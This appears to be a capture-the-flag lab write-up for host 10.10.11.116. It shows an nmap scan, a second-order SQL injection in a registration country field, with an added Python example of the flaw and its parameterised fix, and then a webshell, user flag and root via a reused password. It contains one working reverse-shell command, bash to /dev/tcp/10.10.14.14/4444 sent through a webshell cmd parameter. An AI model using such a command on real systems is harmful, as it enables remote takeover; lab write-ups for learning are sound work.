Basic information

Port scan

22,80,8080:

$ nmap -sC -sV 10.10.11.116

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-27 19:59 CST
Nmap scan report for 10.10.11.116
Host is up (0.32s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
| 256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_ 256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
119/tcp filtered nntp
1113/tcp filtered ltp-deepspace
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
5033/tcp filtered jtnetd-server
5280/tcp filtered xmpp-bosh
5987/tcp filtered wbem-rmi
8080/tcp open http nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.52 seconds

80

Second-order SQL injection

In the country parameter: registration goes through normally, but an error appears when the stored value is viewed, so this is probably a second-order SQL injection:

Confirming it exists:
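To make the defect pattern concrete, here is an added illustration (not code from the target or from this writeup) of a second-order injection in a registration flow: the country value is stored with a safe parameterised INSERT, and the bug only appears later when the stored value is trusted and spliced into a second query. The schema, users and the check function are constructed for the example; the hardened reader shows the fix.

```python
import sqlite3

# Constructed schema: a registration form stores a user's country, and a later
# page lists everyone from that country (the second-order use of the value).
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE registration (username TEXT, country TEXT)")
    db.executemany("INSERT INTO registration VALUES (?, ?)",
                   [("alice", "Brazil"), ("bob", "Brazil"), ("carol", "Chile")])
    return db

def register(db, username, country):
    # Registration itself is parameterised, so the write looks safe and the
    # form "works normally" for any input, including one containing a quote.
    db.execute("INSERT INTO registration VALUES (?, ?)", (username, country))
    db.commit()

def stored_country(db, username):
    row = db.execute("SELECT country FROM registration WHERE username = ?",
                     (username,)).fetchone()
    return row[0] if row else None

def users_in_country_vulnerable(db, username):
    # Second-order defect: the stored value is treated as trusted because it
    # "came from the database" and is concatenated into a new statement.
    country = stored_country(db, username)
    query = "SELECT username FROM registration WHERE country = '" + country + "'"
    return [r[0] for r in db.execute(query)]

def users_in_country_fixed(db, username):
    # Hardened form: every value, whether from the request or from the
    # database, is passed as a bound parameter, never as query text.
    country = stored_country(db, username)
    rows = db.execute("SELECT username FROM registration WHERE country = ?",
                      (country,))
    return [r[0] for r in rows]

def second_order_check(db):
    """Register a user whose country contains a single quote, then exercise
    both readers. Returns (vulnerable_raised_error, fixed_result)."""
    register(db, "probe", "Brazil'")
    try:
        users_in_country_vulnerable(db, "probe")
        raised = False
    except sqlite3.OperationalError:
        raised = True  # the quote altered the statement's structure
    return raised, users_in_country_fixed(db, "probe")
```

A syntax error from the vulnerable reader is exactly the "error appears when viewing" symptom described above, while the parameterised reader simply returns the rows whose country is the literal stored string.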

Writing files

Testing that files can be written:

webshell

reverse shell & user flag

10.10.11.116/miao.php?cmd=bash -c 'exec bash -i %26>/dev/tcp/10.10.14.14/4444 <%261'

The resulting www shell has permission to read user.txt:

Privilege escalation & root flag

The config contains a global password; switch to root with it:

References